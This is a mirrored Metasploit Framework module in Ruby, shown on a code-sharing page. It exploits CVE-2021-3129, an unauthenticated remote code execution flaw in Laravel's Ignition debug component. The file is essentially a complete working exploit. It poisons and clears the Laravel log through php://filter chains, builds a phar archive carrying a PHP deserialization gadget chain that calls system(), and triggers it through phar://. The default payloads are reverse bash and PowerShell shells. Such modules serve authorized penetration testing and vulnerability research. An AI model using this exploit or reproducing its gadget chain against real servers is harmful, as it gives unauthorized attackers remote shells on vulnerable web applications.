Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/php/ignition_laravel_debug_rce.rb
29970 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  prepend Msf::Exploit::Remote::AutoCheck

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Unauthenticated remote code execution in Ignition',

17
        'Description' => %q{

18
          Ignition before 2.5.2, as used in Laravel and other products,

19
          allows unauthenticated remote attackers to execute arbitrary code

20
          because of insecure usage of file_get_contents() and file_put_contents().

21
          This is exploitable on sites using debug mode with Laravel before 8.4.2.

22
        },

23
        'Author' => [

24
          'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging

25
          'ambionics' # discovered

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2021-3129'],

30
          ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']

31
        ],

32
        'DisclosureDate' => '2021-01-13',

33
        'Targets' => [

34
          [

35
            'Unix (In-Memory)',

36
            {

37
              'Platform' => 'unix',

38
              'Arch' => ARCH_CMD,

39
              'Type' => :unix_memory,

40
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }

41
            }

42
          ],

43
          [

44
            'Windows (In-Memory)',

45
            {

46
              'Platform' => 'win',

47
              'Arch' => ARCH_CMD,

48
              'Type' => :win_memory,

49
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }

50
            }

51
          ]

52
        ],

53
        'Privileged' => false,

54
        'DefaultTarget' => 0,

55
        'Notes' => {

56
          'Stability' => [CRASH_SAFE],

57
          'Reliability' => [REPEATABLE_SESSION],

58
          'SideEffects' => [IOC_IN_LOGS]

59
        }

60
      )

61
    )

62
    register_options([

63
      OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),

64
      OptString.new('LOGFILE', [false, 'Laravel log file absolute path'])

65
    ])

66
  end

67


68
  def check

69
    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")

70
    res = send_request_cgi({

71
      'uri' => normalize_uri(target_uri.path.to_s),

72
      'method' => 'PUT'

73
    })

74
    # Check whether it is using facade/ignition

75
    # If is using it should respond method not allowed

76
    # checking if debug mode is enable

77
    if res && res.code == 405 && res.body.match(/label:"(Debug)"/)

78
      vprint_status 'Debug mode is enabled.'

79
      # check version

80
      versions = JSON.parse(

81
        res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}')

82
      )

83
      version = Rex::Version.new(versions['framework_version'])

84
      vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"

85
      # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid)

86
      # but it is way more intrusive than just checking the version moreover we would need to call

87
      # the find_log_file method before, meaning four requests more.

88
      return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')

89
    end

90
    return Exploit::CheckCode::Safe

91
  end

92


93
  def exploit

94
    @logfile = datastore['LOGFILE'] || find_log_file

95
    fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile

96


97
    clear_log

98
    put_payload

99
    convert_to_phar

100
    run_phar

101


102
    handler

103


104
    clear_log

105
  end

106


107
  def find_log_file

108
    vprint_status 'Trying to detect log file'

109
    res = post Rex::Text.rand_text_alpha_upper(12)

110
    if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?})

111
      logpath = Regexp.last_match(1).gsub(/\\/, '')

112
      vprint_status "Found directory candidate #{logpath}"

113
      logfile = "#{logpath}/storage/logs/laravel.log"

114
      vprint_status "Checking if #{logfile} exists"

115
      res = post logfile

116
      if res.code == 200

117
        vprint_status "Found log file #{logfile}"

118
        return logfile

119
      end

120
      vprint_error "Log file does not exist #{logfile}"

121
      return

122
    end

123
    vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'

124
    return

125
  end

126


127
  def clear_log

128
    res = post "php://filter/read=consumed/resource=#{@logfile}"

129
    # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)

130
    fail_with(Failure::UnexpectedReply, "Log file #{@logfile} doesn't seem to exist.") unless res.code == 200

131
  end

132


133
  def put_payload

134
    post format_payload

135
    post Rex::Text.rand_text_alpha_upper(2)

136
  end

137


138
  def convert_to_phar

139
    filters = %w[

140
      convert.quoted-printable-decode

141
      convert.iconv.utf-16le.utf-8

142
      convert.base64-decode

143
    ].join('|')

144


145
    post "php://filter/write=#{filters}/resource=#{@logfile}"

146
  end

147


148
  def run_phar

149
    post "phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt"

150
    # resp.body.match(%r{^(.*)\n<!doctype html>})

151
    # $1 ? print_good($1) : nil

152
  end

153


154
  def body_template(data)

155
    {

156
      solution: 'Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution',

157
      parameters: {

158
        viewFile: data,

159
        variableName: Rex::Text.rand_text_alpha_lower(4..12)

160
      }

161
    }.to_json

162
  end

163


164
  def post(data)

165
    send_request_cgi({

166
      'uri' => normalize_uri(target_uri.path.to_s),

167
      'method' => 'POST',

168
      'data' => body_template(data),

169
      'ctype' => 'application/json',

170
      'headers' => {

171
        'Accept' => '*/*',

172
        'Accept-Encoding' => 'gzip, deflate'

173
      }

174
    })

175
  end

176


177
  def generate_phar(pop)

178
    file = Rex::Text.rand_text_alpha_lower(8)

179
    stub = "<?php __HALT_COMPILER(); ?>\r\n"

180
    file_contents = Rex::Text.rand_text_alpha_lower(20)

181
    file_crc32 = Zlib.crc32(file_contents) & 0xffffffff

182
    manifest_len = 40 + pop.length + file.length

183
    phar = stub

184
    phar << [manifest_len].pack('V')              # length of manifest in bytes

185
    phar << [0x1].pack('V')                       # number of files in the phar

186
    phar << [0x11].pack('v')                      # api version of the phar manifest

187
    phar << [0x10000].pack('V')                   # global phar bitmapped flags

188
    phar << [0x0].pack('V')                       # length of phar alias

189
    phar << [pop.length].pack('V')                # length of phar metadata

190
    phar << pop                                   # pop chain

191
    phar << [file.length].pack('V')               # length of filename in the archive

192
    phar << file                                  # filename

193
    phar << [file_contents.length].pack('V')      # length of the uncompressed file contents

194
    phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.

195
    phar << [file_contents.length].pack('V')      # length of the compressed file contents

196
    phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents

197
    phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags

198
    phar << [0x0].pack('V')                       # serialized File Meta-data length

199
    phar << file_contents                         # serialized File Meta-data

200
    phar << [Rex::Text.sha1(phar)].pack('H*')     # signature

201
    phar << [0x2].pack('V')                       # signiture type

202
    phar << 'GBMB'                                # signature presence

203


204
    return phar

205
  end

206


207
  def format_payload

208
    # rubocop:disable  Style/StringLiterals

209
    serialize = "a:2:{i:7;O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\""

210
    serialize << ":1:{S:41:\"\\00GuzzleHttp\\5cCookie\\5cFileCookieJar\\00filename\";"

211
    serialize << "O:38:\"Illuminate\\Validation\\Rules\\RequiredIf\""

212
    serialize << ":1:{S:9:\"condition\";a:2:{i:0;O:20:\"PhpOption\\LazyOption\""

213
    serialize << ":2:{S:30:\"\\00PhpOption\\5cLazyOption\\00callback\";"

214
    serialize << "S:6:\"system\";S:31:\"\\00PhpOption\\5cLazyOption\\00arguments\";"

215
    serialize << "a:1:{i:0;S:#{payload.encoded.length}:\"#{payload.encoded}\";}}i:1;S:3:\"get\";}}}i:7;i:7;}"

216
    # rubocop:enable  Style/StringLiterals

217
    phar = generate_phar(serialize)

218


219
    b64_gadget = Base64.strict_encode64(phar).gsub('=', '')

220
    payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join

221


222
    return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00'

223
  end

224


225
end

226


227